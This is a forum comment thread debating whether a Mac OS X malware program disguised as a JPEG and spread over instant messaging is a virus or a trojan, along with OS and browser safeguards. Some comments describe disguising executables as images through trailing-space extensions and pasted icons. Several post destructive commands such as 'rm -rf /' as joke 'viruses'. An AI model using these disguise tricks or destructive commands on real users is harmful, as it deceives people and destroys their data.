If you take a "plain executable" and give it an extension of .jpg, it will then in fact look like a jpeg (the file icon changes to that), but when you open this trojan file, it just attempts to open it in Preview, because it in fact things it's a jpeg, and Preview just says it can't open it. That's not going to do it either.

Re:You can't man a .app look like a .jpg in OS X

If you take a "plain executable" and give it an extension of ".jpg ", it will still work as an executable, the name will look like an innocent piccy, and a quick paste will make it look happy and innocent too.

Re:You can't man a .app look like a .jpg in OS X

[sjonke]

Perhaps I don't know what you mean by a "plain executable", but as noted, I tried it and it didn't work. I tried to do this with "cp" in /bin and while making the name be "cp.jpg" did make the file look like a jpeg, it also caused the mac to try to open the file in Preview, as a jpeg, which failed because it isn't a jpeg. It didn't execute it.

Re:You can't man a .app look like a .jpg in OS X

You didn't understand what I wrote. You need to include a space at the end of the file name, use quotes if you use the shell. In Finder the name will look like it has a .jpg extension, even though it really has ".jpg " as its extension.

Pasting refers to fixing up the icon.

Re:You can't man a .app look like a .jpg in OS X

Ok, now just copy the binary and don't rename it to .jpg (remember that Finder hides extensions by default). IIRC, if you use Get info you can paste any icon there, including the generig picture icon. Double-clicking would execute the binary and not open Preview. This would be good enough to fool most casual users.

Re:You can't man a .app look like a .jpg in OS X

[sjonke]

Ah, now I see, and it does work. Good point.

Re:You can't man a .app look like a .jpg in OS X

[m50d]

But if you're hiding extensions, test.jpg and test.app will look the same. So this won't save users who are hiding extensions.

Re:You can't man a .app look like a .jpg in OS X

[Overly+Critical+Guy]

Plain executables don't even run from the Finder. Finder wants well-formed .app bundles.

Re:You can't man a .app look like a .jpg in OS X

[Overly+Critical+Guy]

They're saved by the password prompt. That's the point where the user is the one giving the permission for the app to run, meaning it's not the fault of the OS. Regardless, I have a feeling Apple will modify the text of the prompt to more greatly clarify that an executable application is asking for permission and it's not just OS X asking for a password for something.

Re:You can't man a .app look like a .jpg in OS X

[Mark+Hood]

This has been done for a while - I thought that any application with a dot in the name (other than the terminating .app) should show up as try.jpg.app - precisely to avoid this scenario from happening.

In fact, it's not everything. I created an app, and renamed it test.jpg, and it stuck .app on the end. Same with .txt .doc .dmg .exe .avi .mov and whatever else I could think of.

When i tried with .xxx it stayed as .xxx - i.e. OS X didn't add the .app suffix, but then if you're expecting a .xxx file to be a document, you might well be disappointed!

Sounds reasonable to me - any registered document type cannot be used as the last characters on a file name for an application...

Of course, as other posters have pointed out you can use the old OS 9 'Creator/Type' codes to create a runnable application without a .app extension. Not sure what happens then...

Don't forget, there's nothing to stop me telling you to download this new whizzy P2P software, and when you unzip the archive it's a shell script saying 'rm -rf /' or (if you don't want the password prompt 'rm -rf ~'. Doesn't make the platform insecure any more than doing the same with a batch file on Windows that does 'deltree c:\'

Be honest, how many of you have tried software from a site you don't trust 100%? Despite all the warnings, and what you know? Exactly. People will always fall for trojan horses - on any architecture or operating system.

Mark

my own new most vicious trojan script

(script of Trojan)

Hey User, Read and Do The Following:

open new finder window -> select all -> move to trash -> select "empty trash" -> click OK

If it's anywhere, it will be through Bonjour

[simong]

Bonjour is a good implementation of zeroconf and will be one of the ways forward for making networking transparent in the future. However, at this stage in its development it still seems to me to be insecure and experimental in its wide area applications, perhaps more in its undiscovered potential than its current abilities. I suspect that to make it secure it's going to need a whole new level of content based security. I hope someone takes at Apple takes this as a warning. Oh soryy, what am I saying?

Re:If it's anywhere, it will be through Bonjour

[Overly+Critical+Guy]

As long as OS X pops up a password prompt any time a program tries to be malicious, it's already protecting you from abuses. When the user gives the program permission to run by supplying their password, that makes it a user-run program and not a system flaw exploit.

Dang It!

[JoeCommodore]

I had to change my signature because of this. :-/

Bad article title

[Lemmingue]

OSX should be written together, not OS X. The title can be read "First OS vs virus?". We know this battle is already lost.

======
Am I new here?

Re:Bad article title

[cailyoung]

Except that the product name is OS X, not OSX.

Re:Bad article title

OSX should be written together, not OS X. The title can be read "First OS vs virus?". We know this battle is already lost.

======
Am I new here?

No, you're not new, you're just wrong :) "X" is not shorthand for "vs."-- "vs." itself is shorthand for "versus". "X" might be shorthand for multiplication or something, but as far as I know, "X" doesn't have any interpretation as "versus" in normal usage. (Notwithstanding the other folks in this thread, who pointed out that the correct product name really is "Mac OS X" as well :)

YHBT

[maeddi]

YHL GBTW

Let me get this straight...

[ShadowDawn]

If I write:

#include
main()
{
        (void) printf("Hello World\n");
        return (0);
}

and also included a couple lines to 'rm -rf /User/Home'....

Then I e-mailed or IM'd a person the executable, then asked them to decompress it, double-click on it, and laugh, that would be Mac OS X's first virus/trojan? Ohh wait, I need to associate a pretty icon to it too.....

As much as this author would like to claim they are the first, I think the programmers at Apple were the first ones to do this with their "Disk Utility" that a user has to click on to 'newfs' or your Windows users 'format' your hard drive.

I can not believe this made Slashdot....

Re:Let me get this straight...

LMAO. Did yo give it a .piff extension?

Re:Let me get this straight...

[Overly+Critical+Guy]

You forgot the most important part. OS X brings up a password prompt. That effectively stops any destructive program in its tracks and any automated hooking processes. On a secure system that requires the user to enter a password to grant the program permission to do what it does, that changes it from a virus/trojan to a mere user-run program.

Social engineering is a whole other issue from actual OS flaws (like the WMF vulnerability in Windows), but in this case OS X is still protecting you by prompting for your permission for this app to run.

Regardless, I imagine in the next OS X Tiger update, Apple will change the text of the password prompt to say "This program needs your password to run" instead of whatever it says now (I think it's "OS X needs your password") to make sure people realize it's an executable asking for permission.

Re:Let me get this straight...

[Triple+Click]

Whew. I'd be okay, because my name isn't Home. :)

Re:Let me get this straight...

[geekoid]

Yes, because adding a prompt of some sort before executing will really help.

Hint: The person clicked on it, they WANT to run it.

Re:Let me get this straight...

[Overly+Critical+Guy]

If a password prompt is appearing for a supposed JPEG, you know something is up. Safari already warned it was an application in the first place. That prompt means OS X is a secure system that requires the user's permission before running any automated processes.

Re:Let me get this straight...

[Ilgaz]

If you manage to code a input manager that automatically, without your intervention sends it to your iChat buddies (entire .mac base), it is a virus/trojan whatever. It propangates.

You really think windows viruses are geniusly hand coded, hiding in video card memory ASM miracles?

Think again, you should consider yourself "lucky" if you find a "C" virus anymore.

I think Apple fanboys are the excellent allies of future OS X viruses. Trojans.. Whatever you call it.

WOW !!!...

[mAIsE]

well if this is the only viri i need to worry about I am glad i use Mac OS X. How many viri does windows collect in only one month ? ....

just a hype ?

[richlv]

so, having "windows_vista_final_screenshots.zip" that woul contain executable with some icon would a virus, too ?

what about "kde_4_screenshots.tgz" with similar payload as this one ?

(note that there is no way to run the executable automatically and, it seems that it is not self-propogating in any way)

Five stages of grief

[sg3000]

I think this is a bit overblown. It sounds like a Trojan Horse, not a virus. But the originally posted messages are kind of funny. Has anyone else noticed that if you look throughout the Mac OS Rumors threads, you can find examples that follow the five stages of grief?

1. Denial and isolation

Is this another non story just so we can toss a non story at people who argue that a Mac will be just as crap as windows given time and enough crazy automation in our email clients?

2. Anger

Oh God, shut up. The fact that you worked at an Apple Store means nothing, get over yourself. "At least a dozen people" HAHA yeah OK, you want to tell me you didn't pull that completely out of your butt?

3. Bargaining

if anyone thinks that they can isolate it and reverse engineer it or anything like that i will be happy to give you the mirrored link

4. Depression

that is seriously depressing. i am officially shaken from my nice little warm fuzzy macintosh lull.

5. Acceptance

We all knew this day would come.
It's ok, although some of you are a bit shocked, this thing was eventually going to happen. I just hope that Apple will help stop these kinds of things from happening. Safari already tells us when we download a program, and even an .exe, maybe Apple just has to add what Safari looks for when we download it. That would hopefully prevent this from ever happening again.

I think with the appropriate counseling, the MacOSRumors.com community will be just fine.

Just finished my new OSX Virus.

[xabi]

#!/bin/sh rm -rf /

Re:Just finished my new OSX Virus.

Ive always wondered why the writers of rm dont put up a warning to forbid any non-root users from running this command.

Yes, I know any luser who runs this will not kill the box, but only delete their home drive. I know that any user who runs this after making it executable deserves what they get.

But how hard is it to write a special case if the target is / to only allow this to be run by the root user and then require 2 prompts to confirm.

That way anyone trying this trick will need to do rm -rf ~ which is much less potentially damaging when run as root.

Re:Just finished my new OSX Virus.

[GodotJr]

Test it on your machine! Test it on your machine! Show us the screen grab afterwards!

The Latest Scoreline

[SilentOneNCW]

Mac OS X: 1 Windows XP: 4,234,278,247,295 and counting Yup, now that OS X isn't secure, we'd better migrate back to Windows!

Re:The Latest Scoreline

[geekoid]

Yeah, thats valid. Except 90% of those windows viruses are basically the same thing.

If I took this worm, and change the jpeg, would you consider that the same thing as the current one, or count it as a sepaqrate one?

Yes BSD is more secure, but with Apple becomes more minstream, you had better keep an eye on the game, and not just on the specific issue.

Really new?

[Metaplasmus]

Even in the realm of OS X, is this exploit really all that new or exciting? Not having gotten my hands on a copy of this, I don't know how it works, but it seems similar to the proof-of-concept from nearly two years ago, which exploited issues in the Finder with handling file extensions vs. type/creator codes (IIRC, the proof was an application with type code 'APPL' and extension .mp3, which made the Finder display it as an MP3 but treat it as an application when clicked).

Re:Really new?

[Pfhreak]

Not having gotten my hands on a copy of this, I don't know how it works, but it seems similar to the proof-of-concept from nearly two years ago, which exploited issues in the Finder with handling file extensions vs. type/creator codes (IIRC, the proof was an application with type code 'APPL' and extension .mp3, which made the Finder display it as an MP3 but treat it as an application when clicked).

Not quite. MP3Concept, like the one from the article (JPGConcept? ;-), used the common icon for a particular file type as the application's custom icon. When MP3Concept was all the rage, I tested this by changing my default MP3 icon. (I think I just added a small, red triangle in one corner, just something that was easily visible.) I had to log out and back in for the changed icon to propagate, but once it did, all of my legitimate MP3s had the updated icon, while "virus.mp3" (MP3Concept) still had the un-modified icon. So, no, Finder wasn't getting confused about what type of file it was. Finder knew it was a program, and not an MP3, but the custom icon tricked the user into thinking it was an MP3. The reason iTunes would play an MP3 when you double-clicked on "virus.mp3" was because MP3Concept was programmed to tell iTunes to play an MP3 hidden in MP3Concept.

Re:I call Dupe

[hunterx11]

Apple made it so that the .app extension cannot be hidden, and so that one is warned before running any application for the first time, probably as a direct result of the mp3 trojan. A user being allowed to execute code he chooses to may be a vulnerability, but is isn't one to be "fixed."

GPS viruses

whats next viruses spread by gps satelites ?

Kipling-lovers must wonder...

[xactuary]

Just how did Leopard get into this spot?

HIV is not a virus...

You cannot be infected by this unless you do all of the following:

1) Are somehow hooked-up with or bringing home the "infected chick"

2) Un-click the bra strap and pants button to en-naked the chick

3) Insert dong into resulting hole to "fill" it ...and then for most users, you must also forget to put on the "protector".

You cannot simply "catch" the virus. Even if you do bring home the "infected chick", you cannot be infected unless you expose the hole, and then fill it.

How to make a .app look like a .jpg in OS X

[mh101]

Step 1. Command-click on a jpeg file and select Get Info.

Step 2. Click on the jpeg icon in the top corner, then select Edit > Copy from the Finder menu.

Step 3. Command-click on a .app file and select Get Info.

Step 4. Click on the application's icon, then select Edit > Paste from the Finder menu.

Step 5. ???

Step 6. PROFIT!

Re:How to make a .app look like a .jpg in OS X

Yes, you've discovered that application can have custom icons, good for you. But, as he said, it will still be "File.jpg.app". (And it's control-click not command-click.)

Re:I call Dupe

[RyuuzakiTetsuya]

A) New variant of that.
B) If this IS a dupe that means that the virus has duplicated and spread!

Mod parent funny or overrated

[grimJester]

Come on. The parent post is a joke, not provocative in any way. Use +1 funny or -1 overrated mods, not troll or flamebait.

Nope.

[MarcQuadra]

Sorry, but the type of exploits we really fear (remote arbitrary code execution) ARE platform specific. One of the reasons I use a PPC as my gateway instead of an X86 is because on the off chance I am running a service with a vulnerability, the attackers will most likely overflow my buffers with X86 code that won't execute on my box.

Could the hacker just as easily change to PPC and attack me just as hard? Yes, but most don't.

Whe you take advantage of a buffer overflow, you're injecting machine code or bytecode into an unchecked buffer, overwriting the next piece of executable code in memory. The payload for this type of attack IS platform specific, unless you're attacking a bytecode-interpreting machine, line the JavA VM.

Re:Nope.

[iBod]

True, but surely the injected code needs to do something meaningful with the running environment (OS and Apps) unless it just wants to lock up or crash the machine.

Thank GOD there is finally a virus

[Danathar]

I happen to be in the camp that says "Show me a virus on OS X". It's debatable if this is a virus or a Trojan, but in some ways it would be nice to just get a virus and be done with it. Then all the neigh-sayers can jump up and down in Glee saying "I told you...I told you...nananana"...I can then ignore them finally and get back to using a my Mac, a system that even if one virus/trojan is found is STILL a better more secure system than windows.

Re:Thank GOD there is finally a virus

[ninja_assault_kitten]

Don't get so defensive, hippy.

Re:Thank GOD there is finally a virus

its not debatable, its a trojan

Re:Thank GOD there is finally a virus

[mph]

Then all the neigh-sayers can jump up and down...

Stop dragging the horses into this.

Means...

[Greyfox]

People are starting to target the platform. This sort of attack has been around for decades, and would work just as well on Linux as it would on OSX -- if I send someone an executable and they run it, there's not much that can be done.

What OS and App manucfacturers CAN do is make it harder to inadvertently run such programs. Saving files from the net in a non-executable directory tree would be a good start. Setting up apps that might be exposed to hostile behavior to run as another user and making sure that the user they run as can't access anything useful, run servers or open outbound connections would be another.

I think users are getting more savvy about security, too. Complacency on Windows systems can cost you, and users are becoming increasingly aware that Microsoft isn't going to protect them. Maybe sometime around September 6000, 1993 it might finally become October. Maybe Sepember 7000...

Um, NO. "OS X", not "OSX"

Um, no. The offical title has a space between OS and X.

Suggest you take a look at a definitive source. Perhaps http://www.apple.com/ would be acceptable to you. Take a look at the top right tab. If that doesn't convince you, click on that tab.

Personally I don't care which you use, but if you're going to go around correcting folks, it pays to check your facts first.

Re:Won't someone please think of the children!?!?!

[tbone1]

[Thinks of the children]

Mmm, delicious! Pass the kitten gravy, please.

Rocket Scientist

[ninja_assault_kitten]

Thanks for your keen insight.

Dangerous, but not a virus

[wtmcgee]

A file that 'looks' like a jpg, that, upon clicking asks for your admin password is not a virus. It's still quite dangerous, but it looks like a trojan or a script of some kind.

There is no OS that can protect from user stupidity - whether it's Linux, OS X or Windows.

"Bon Jour" Messaging

[datasetgo]

ahh hell, I'm still waiting on Bon Scott messaging. You know it'd be a helluvah lot cooler.

OT - never got that

[BitterAndDrunk]

I never really got the whole "look we'll hide the file type for you! So convenient!" thing in Windows. The first thing I do on a new Windows box is unhide system files and unhide known extensions.

And a whole bunch of other file display changes; icons don't help me as much as created date, file type, etc.

Anyway. This was a useful post.

Re:OT - never got that

[JasonKChapman]

never really got the whole "look we'll hide the file type for you! So convenient!" thing in Windows. The first thing I do on a new Windows box is unhide system files and unhide known extensions.

Oddly, it was intended to make Windows more Mac-like. The Mac GUI was heralded as being simpler and easier to use precisely because it didn't bog users down with techno-jargon like ".exe", ".com", etc. Windows decided to follow suit, while leaving the option available. The problem is, they were hiding the *one bloody thing* that determined whether or not the entity would execute with a double-click. OSs with execute bits don't need no stinkin' extensions for that.

Ed. update title to be more descriptive TROJAN!!!!

[webweave]

What's with you guys. Next thing I'll find is the dupe.

Custom icons in Mac OS 7 through 9

[tepples]

So, why allow customization of icons?

Because Mac users expect it. The feature was present in versions 7 through 9 of the operating system, and apps often wrote a thumbnail into the custom icon.

List View

[Kadin2048]

That's a totally legitimate question.

If you choose "View as List" in the finder (equivalent to the Detail view in Windows), and then expand the window so that you can see the "Kind" column, the Finder will tell you the kind of file you're looking at. For example, Application, Picture, Document, etc.

The Finder looks at some stuff which is not visible to the user in determining this -- in addition to the ".app" file extension on Cocoa bundles, there are also the traditional Mac 'Type' and 'Creator' codes, stored in the file metadata in the resource fork. By setting a file's Type to "APPL," it becomes an executable. This is the traditional Macintosh analog to the UNIX eXecute bit (but arguably more flexible, since it also handles file typing), and is totally independent of the file name. But anything that you set this way will be clearly marked as an Application in List View, regardless of what you name it, or what kind of custom icon it has.

This is how the MP3Concept trojan worked, and how many old-school ResEdit tricks worked. You can have something that's legitimately named "Mp3Concept.mp3" and looks like an MP3 but is really an executable, by setting the Type and custom icons correctly. It's nothing new, people have been doing it for years. (There were a lot of ResEdit "hacks" that worked off of this principle -- for example, creating a dummy Excel document that gave a rude dialog when double-clicked.) I think it's because we've migrated away from OS 9 and the metadata concepts that people have forgotten how easy it is to do, and that the Mac still supports it.

Re:List View

[Burz]

A user should not have to go that far.

An OS should enforce a standard image overlay (like a red circle or arrow) on all executables. Its astounding to me that no OS in wide use will consistently show code and data as distinct.

Sometimes an application's associated types have the SAME icon as the app itself! We can blame users for laxity, but developers have done their part in confusing code/data in their minds.

Mac OS X, not just OS X

[tepples]

Except that the product name is OS X

No, the product name is Mac OS X.

Re:Mac OS X, not just OS X

[cailyoung]

You are correct, sir, but that doesn't make the GP correct.

Re:MOD PARENT UP - IT IS A VIRUS

[DrLex]

Face it fanboys: your god has a virus. And even worse, you are so technically incompetent you don't even know what a virus is. You aren't qualified to be taking part in this discussion.

Face it trollboy: if you would have done some more effort to see how it works, you would see from your own quoted definitions that this is not a virus. A virus spreads between different computers without any user interaction. However, this thing is only able to send the fake JPEG file to other computers via a few IM programs. The users on those other computers still need to be online, accept the file, and open it themselves to 'install' it. Therefore it is a trojan. Only within the limits of a single computer it could be considered a virus, because it can copy itself automatically to other programs upon opening an infected one (provided that the user who opens it has enough privileges to modify programs).

I like OS X, but...

[Deslock]

... why did they use the "all or nothing" approach of requiring the admin password to install some things? Why not introduce a new model where everything in the filesystem is an object of one of the following types:

- operating system
- hardware
- hardware configuration
- program
- program configuration
- interface configuration
- data

Have the option of using different passwords for access to operating system, hardware, and program objects. When you run a program installer, it wouldn't be able to mess with your hardware or OS that way. The admin password would basically never be needed unless you were doing OS updates.

Re:I like OS X, but...

[Stalin]

The programs that install with the system installer program (whatever its name is) install to the system-wide "/Applications" directory, by default. If you specify a user's "~/Applications" directory, I don't think you have to type the root password. I'm not sure about that, though; I don't install too many programs that use that installer. The ones I do install, which use it, I don't mind them installing to the system-wide directory. Any drag-and-drop install programs I download go into my "~/Applications" directory (or a sub-directory thereof).

Also, there are some programs that install more than just what you interact with. A couple of examples: I have a USB->Serial adapter that requires a kernel extension to use. It installs with the sytem installer. Also, NeoOffice installs at least one thing that goes into a protected directory -- a Spotlight plugin. Sure, they could install the plugin to the user's local Spotlight plugin directory, but they don't.

In short, I don't mind having to use my root password to install some things. I just make sure I know what is actually being installed when I do so. That is what the password prompt is for -- to make the user question what they are doing.

Duh. What I left out...

[Kadin2048]

Oh, and the most obvious thing, you'd have to also look for the resource fork's Type code that's used on Carbon apps, and flag it as executable if the Type was APPL.

(See my other comments in this discussion -- this is how MP3Concept works, and the Type code is the traditional, pre-OSX Mac analog to the UNIX eXecute bit or the Windows/DOS file extension.)

ITYM "Bon Jovi Messaging"?

[argent]

That'd make this the first "Retrosexual Virus".

Also not the first for OS/X

[hawk]

Someone needs to point out that this is hardly the first virus that will work on OS X.

All of the older unix viruses still work just fine.
Remember the honor system viruses, which informed you that you were now obligated to delete a few files at random and then send the virus on?

:)

hawk

If it spreads, then isn't it a 'virus'?

[I'm+Don+Giovanni]

Disregarding the old-school viruses that attached themselves to executables, isn't today's definition of "virus" = "malware that spreads"? If this is spreading through instant messaging, then it's a virus (or, at least as much as a Windows virus is (Windows doesn't have many old-school "attach to executable" viruses either).

If this is merely a trojan, then it's not the first. A couple of years ago there was malware disguised as a pirated version of MacWord 2004 on warez sites.

Bundles aren't a problem

[alanQuatermain]

There are routines to get the path to a bundle's executable file. It doesn't matter what the extension is, etc. So the Finder can very easily determine whether something is in fact executable. For an example, pop open the Inspector window in the Finder (Cmd-Opt-i) and select a few file. If they're applications, that window will tell you so. If it doesn't say they're an app, the Finder won't even try to launch them. Also, in 10.4.4 upwards, it'll put 'Universal', 'Intel', or 'PowerPC' after the file kind. So, it's not at all difficult to have the Finder flag executable files with a badge.

-Q

Social Engineering Always Works, BUT...

[argent]

Social Engineering Always Works.

This is not a security hole in the OS, this is a social engineering attack, just like every previous "first OS X virus" has been.

Social engineering works, BUT for most people it doesn't work very often. Once is usually enough... UNLESS the system trains them to click "OK" when presented with a security dialog. If you can keep it from working a second time, you'll kill this kind of attack dead.

I've had the same people come to me many times and say "Peter, I think I have a virus, I clicked 'OK' again". I've never had someone come to me and say "Peter, I saved a file and opened it and I think I have a virus" more than once. Because when you download a file, there's no urgency, you don't have to decide RIGHT THEN whether to go on with it. You can stop and wait, and no reflex loop develops. And that pause, even if it's brief, is more than enough for most people to get out of the "open everything anyway" habit.

In Safari, TURN OFF "OPEN SAFE FILES AFTER DOWNLOAD". There are NO "safe" files that are guaranteed to be safe.

In instant messaging, don't use an application that doesn't give you the ability to completely disable automatic execution (with or without a dialog) of downloaded files.

Back when social engineering was the virus vector, and you had to actually save a file to disk and open it as a separate action, viruses spread slowly. When Microsoft integrated IE and the desktop and allowed automatic execution of untrusted content, THAT is when they took off. And the biggest problem with Microsoft setting such a low bar is that people accept a slightly higher bar (a dialog box) as OK, EVEN WHEN THAT IS PROVEN INADEQUATE.

Users: Don't automatically open files.

ALWAYS save them to disk, and run them by hand, later.

Developers: Don't give users an option to bypass this step.

Re:Social Engineering Always Works, BUT...

[geekoid]

Market will not allow this.
If people can not open files when they want to, they will favor a system that does. Which obviously creates a market demand that will be exploited.

Perhaps it should open in a sandbox, and the system should look at what it is trying to do, Then act upon that information?

Re:Social Engineering Always Works, BUT...

[argent]

If people can not open files when they want to, they will favor a system that does.

There's an awful lot of people using Firefox and other Mozilla-based browsers that have this option turned off by default, and provide a more convenient download manager to provide the capability.

Perhaps it should open in a sandbox

The files that can be opened in a sandbox are opened in a sandbox. The browser itself. "Open Safe Files" opens those files that require an external program, outside the sandbox.

Social Engineering vs Dialog Boxes

[argent]

I've been saying that dialog boxes asking "DO YOU WANT TO DO THIS STUPID THING" were a stupid idea since before Safari was created.

And I've been saying this was a problem in Safari since it's existed.

Users: TURN OFF "OPEN SAFE FILES AFTER DOWNLOADING"

Apple: TAKE THAT OPTION OUT OF SAFARI.

Re:Social Engineering vs Dialog Boxes

[ceoyoyo]

Um, this isn't a safe file. Safari will warn you when you download it that it's an app, then you'll have to go and open it yourself, manually.

Repeat, this is not a JPEG file that Safari will open automatically for you. That would be a real, serious vulnerability.

Re:Social Engineering vs Dialog Boxes

[argent]

Safari will warn you when you download it that it's an app, then you'll have to go and open it yourself, manually.

OK, that's one point in Safari's favor, and people who are infected by this through Safari won't make that mistake again. There have, however, been other attacks that did meerly present a dialog box, and there will be more in the future as more holes in applications that register with LaunchServices are found.

What about AIM? What interface does it present? A dialog box?

Re:Social Engineering vs Dialog Boxes

[ceoyoyo]

You can't really blame the OS for the sins of third party apps though. Entourage used to be fond of autolaunching things for you, even on a Mac. The OS can't really stop it, because there are legitimate uses for that sort of thing. It was a flaw in Entourage which, I think, has since been fixed (I wouldn't know, I don't run it). Same with AIM.

Now, the OS does exactly what it should in such a case -- if you run stupid software it prevents the damage from spreading beyond your account. Unless of course you're an administrator and are accommodating enough to enter your password.

Re:Social Engineering vs Dialog Boxes

[argent]

You can't really blame the OS for the sins of third party apps though.

I'm not blaming the OS, I'm blaming the dialog boxes. Plus... does Safari/Finder actually force you to open the file manually, or does it just give you two dialog boxes instead of one?

if you run stupid software it prevents the damage from spreading beyond your account

Man, I've been a UNIX guy since I worked on 4.1C at Berkeley in the early '80s, and I wish Windows had better security around Administrator as well, but that's just silly. The only things on my computer I care about damaging are in my account, AND there's more than enough places for a virus to hide in ~/Library that, well, I guess it's a good thing that the author of this program wasn't more clear-headed.

Re:Social Engineering vs Dialog Boxes

[ceoyoyo]

I'm not blaming the OS, I'm blaming the dialog boxes.

What dialog boxes? The one in Safari that says Hey, this is an application, are you sure you want to do this? And no, Safari will absolutely not run a program for you. You've got to trundle over and double click it yourself. I don't think iChat will open anything for you.

The only things on my computer I care about damaging are in my account...

Sure, but how is an OS supposed to stop you from doing that if you're an idiot? If you drag everything to the trash and empty it do you expect more than an "Are you sure?" dialog?

What the OS SHOULD do is protect your account from the sins of others. I feel much better letting friends check their e-mail and things on my computer knowing that I can just fast user switch them over to another account and they can't do any real damage. If I had to share a computer with someone, ditto.

You can hide a lot of stuff in ~/Library, but it won't affect me (another user) in the slightest because I've got a different ~/Library.

Re:Social Engineering vs Dialog Boxes

[argent]

Sure, but how is an OS supposed to stop you from doing that if you're an idiot?

It's not, but it's not supposed to encourage it either.

I feel much better letting friends check their e-mail and things on my computer knowing that I can just fast user switch them over to another account and they can't do any real damage.

They can unwittingly leave a background botnet relay running, turning your computer into a virus distribution center and DDoS slave every time they use it.

Re:Social Engineering vs Dialog Boxes

[ceoyoyo]

So in this case how is OS X encouraging you to hose your home dir? It's warning you that the thing you just downloaded is an app, has to decompress it because OS X apps are directories and can only be distributed in packaged form (unlike legit JPEGs), then making you go find it and double click on it. Anything more than that and I'd be complaining because it was a pain to work with the OS.

As for the botnet, that's true, but it'll get turned off when they log out. The OS can't really be expected to tell the difference between a botnet and a legitimate server, can it? I don't think OS X will allow a program to add itself to the autostart list unless you give it your password either.

Re:Social Engineering vs Dialog Boxes

[argent]

So in this case how is OS X encouraging you to hose your home dir?

I'm talking about cases where "Open safe files after downloading" is relevant.

I already said that if this exploit doesn't take advantage of that, it's not a problem, but there have been in the past and will be in the future applications registered with LaunchServices that ARE exploitable. Safari should not act as an enabler for those exploits.

As for the botnet, that's true, but it'll get turned off when they log out.

Not if they know about fopen, fwrite, fork, setsid, and execl.

[example code and other comments deleted lest some idiot think it's a big secret and flame me for "posting an exploit to slashdot"]

Re:Social Engineering vs Dialog Boxes

[ceoyoyo]

I don't really see how it's a big problem. Yes, if I install a program on my computer that abuses the "safe files" then bad things could happen. But that program could do other much worse things than asking Safari to let it know when certain types of files are downloaded.

If there's some sort of exploit, say in an actual JPEG file, then I think it's much more important to fix that exploit than to just tell Safari not to open them for you. If I go and click on something and download a JPEG file I'm going to open it if Safari doesn't do it for me, triggering the exploit anyway.

Re:Social Engineering vs Dialog Boxes

[argent]

Yes, if I install a program on my computer that abuses the "safe files" then bad things could happen.

You're thinking backwards.

We're not talking about an installed program deliberately abusing "open safe files".

We're talking about an installed program having a bug in it that allows it to be exploited, like the "help" or "man" bugs that have already shown up and been patched, individually, or like the "chm" bug on Windows.

If you turn off "open safe files", none of those bugs can be automatically exploited.

I think it's much more important to fix that exploit than to just tell Safari not to open them for you

If you have a *real* JPEG file, Safari will open it itself. That's not the problem, it's the next ".foo" file that is run by "BuggyApplication" that happens to be widely installed. If you turn off "open safe files" you won;t be one of the people who are exploited by the ".foo hole".

Re:Social Engineering vs Dialog Boxes

[ceoyoyo]

That's a good point... I personally always turn off open safe files. It's only really a problem if you can convince Safari to download something automatically though. I much prefer my browser not to download ANYTHING unless I tell it to. If I explicitly tell it to download something then it's not so bad if it opens it for me, since I'll be opening it anyway.

Re:Social Engineering vs Dialog Boxes

[argent]

I much prefer my browser not to download ANYTHING unless I tell it to.

Unfortunately, if it hits a link it doesn't know how to render, it downloads it. You can't turn that off... but you can keep it from using LaunchServices to open it after it's downloaded.

I turn off "Mount Disk Images" and "Continue to Expand" in Stuffit Expander, for the same reason.

Now I can say "I told you so".

[argent]

No application that displays untrusted content should EVER have an option to open files automatically after downloading. No matter whether it thinks they're safe or not. No matter whether you pop up an "I'M ABOUT TO DO A STUPID THING, IS THIS OK?" dialog first. Don't do the stupid thing.

Downloaded files should be dropped in the user's download folder, and left there for the user to take care of or not at their leisure.

CDROMs and USB keys and other external storage should be mounted, and made available to the user, but NEVER EVER auto-run.

Files outside specific "application" or "plugin" locations should never be considered as potential handlers for content, and there must be no mechanism to move files to these locations without an EXPLICIT request by the user.

(yes, that means no auto-installing Dashboard plugins or Firefox extensions... and of course ActiveX is beyond the pale)

I've been trying to make this point to developers and software publishers for at least seven years now, but they're all following Microsoft like lemmings. I've sent in bug reports, suggestions, and made personal requests to people at Apple asking them to back away from the edge before they go over. But... no...

Apple: I TOLD YOU SO.

Everyone else: TURN OFF OPEN SAFE FILES AFTER DOWNLOADING. DON'T USE APPLICATIONS THAT DON'T LET YOU DISABLE AUTO EXECUTE. That means Internet Explorer, Outlook, AIM, anything else that will run untrusted content without you explicitly pointing at a file and saying "OK, I've downloaded this, run it".

Re:Now I can say "I told you so".

[geekoid]

People don't want that, and they would rather take the risk and have the enevitable problem be fixed. Perferable their 'anit-virus' software would catch it and alert them.

If people ahve to change what they want to what the computer wants, then computers have failed us.

Re:Now I can say "I told you so".

You might want to hold off on the "I told you so" until you actually read the article and understand what we're talking about here.

Safari won't just open this app. The user first has to request that the file be downloaded, then Safari will ask if the user would like to open it, then the app is decompressed and launched, then the Finder alerts them that this is a new app being run and asks for verification to do so, then the app asks for the user's password, then the app is executed. Where's the problem there? Yeah, it's with the user.

You can't seriously say that Safari is in any way at fault here. How would it be better if Safari just dumped the downloaded file into the user's download directory so they had to go double-click it from there to start the same sequence of events? There'd be no added protection at all since the user has to *want* to download the file (and presumably wouldn't just change their mind about opening it because Safari didn't do that for them), and in both cases, the user has to start the process manually and OK several levels of confirmation to get the at the payload.

Re:Now I can say "I told you so".

[argent]

People don't want that, and they would rather take the risk...

You can't actually say that people want it. People are not presented with the choice. The browser shows up, and it works that way, and they get used to clicking OK because that's just the way it works. Even if there's an option to turn it off, it's on by default.

Most people don't even wonder if it might not actually be easier if they get downloads as packages in their mailbox instead of "OMG the computer's asking me a question gotta DO something", because they're too used to doing things the way the computer wants.

The current situation is like, oh, imagine if the postman showed up and refused to go away until you actually opened every envelope and inspected the contents, and took away the ones you didn't want to open. Do you really think people would prefer that to just picking up their mail and sorting through it at their convenience?

People have been trained to do things the way the programmer thought they should. That's the real failure.

Re:Now I can say "I told you so".

You still don't get it. Do you even use a Mac? To use your own analogy: It would be like the postman asking if you'd like him to wait and help with opening your mail. If you say yes, he'll actually open your mail for you, show you it's contents, and then file it away to the location you've previously specified. If you say no to him, he simply puts your mail where you want it and allows you to open it at your leisure.

